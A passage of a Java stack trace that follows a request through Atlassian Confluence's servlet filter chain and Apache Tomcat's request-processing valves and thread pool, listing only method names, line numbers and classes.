doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:39, LanguageExtractionFilter (com.atlassian.confluence.web.filter)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
lambda$doFilter$3:44, VCacheRequestContextFilter (com.atlassian.confluence.impl.vcache)
perform:-1, 987941056 (com.atlassian.confluence.impl.vcache.VCacheRequestContextFilter$$Lambda$3670)
doInRequestContextInternal:84, VCacheRequestContextManager (com.atlassian.confluence.impl.vcache)
doInRequestContext:68, VCacheRequestContextManager (com.atlassian.confluence.impl.vcache)
doFilter:43, VCacheRequestContextFilter (com.atlassian.confluence.impl.vcache)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:32, LoggingContextFilter (com.atlassian.confluence.util)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:67, RequestCacheThreadLocalFilter (com.atlassian.confluence.util)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:87, TracingFilter (brave.servlet)
doFilter:49, ZipkinTracingFilter (com.atlassian.confluence.web.filter)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:25, ResponseOutputStreamFilter (com.atlassian.confluence.web.filter)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:59, AbstractJohnsonFilter (com.atlassian.johnson.filters)
doFilter:32, ConfluenceJohnsonFilter (com.atlassian.confluence.web)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilterInternal:35, ConfluenceEncodingFilter (com.atlassian.confluence.setup)
doFilter:44, AbstractStaticResourceAwareFilter (com.atlassian.confluence.web.filter)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:25, ThreadLocalCacheFilter (com.atlassian.confluence.web.filter)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:37, HeaderSanitisingFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:64, FourOhFourErrorLoggingFilter (com.atlassian.confluence.servlet)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:35, IpdHttpMonitoringFilter (com.atlassian.confluence.internal.diagnostics.ipd.http)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:42, HttpRequestMonitoringFilter (com.atlassian.confluence.internal.diagnostics)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:129, HttpHeaderSecurityFilter (org.apache.catalina.filters)
doFilter:48, ConfluenceHttpHeaderSecurityFilter (com.atlassian.confluence.impl.webapp)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:63, DebugFilter (com.atlassian.confluence.web.filter)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
invoke:168, StandardWrapperValve (org.apache.catalina.core)
invoke:90, StandardContextValve (org.apache.catalina.core)
invoke:481, AuthenticatorBase (org.apache.catalina.authenticator)
invoke:765, RemoteIpValve (org.apache.catalina.valves)
invoke:670, AbstractAccessLogValve (org.apache.catalina.valves)
invoke:185, StuckThreadDetectionValve (org.apache.catalina.valves)
invoke:130, StandardHostValve (org.apache.catalina.core)
invoke:93, ErrorReportValve (org.apache.catalina.valves)
invoke:74, StandardEngineValve (org.apache.catalina.core)
service:342, CoyoteAdapter (org.apache.catalina.connector)
service:390, Http11Processor (org.apache.coyote.http11)
process:63, AbstractProcessorLight (org.apache.coyote)
process:928, AbstractProtocol$ConnectionHandler (org.apache.coyote)
doRun:1794, NioEndpoint$SocketProcessor (org.apache.tomcat.util.net)
run:52, SocketProcessorBase (org.apache.tomcat.util.net)
runWorker:1191, ThreadPoolExecutor (org.apache.tomcat.util.threads)
run:659, ThreadPoolExecutor$Worker (org.apache.tomcat.util.threads)
run:61, TaskThread$WrappingRunnable (org.apache.tomcat.util.threads)
run:829, Thread (java.lang)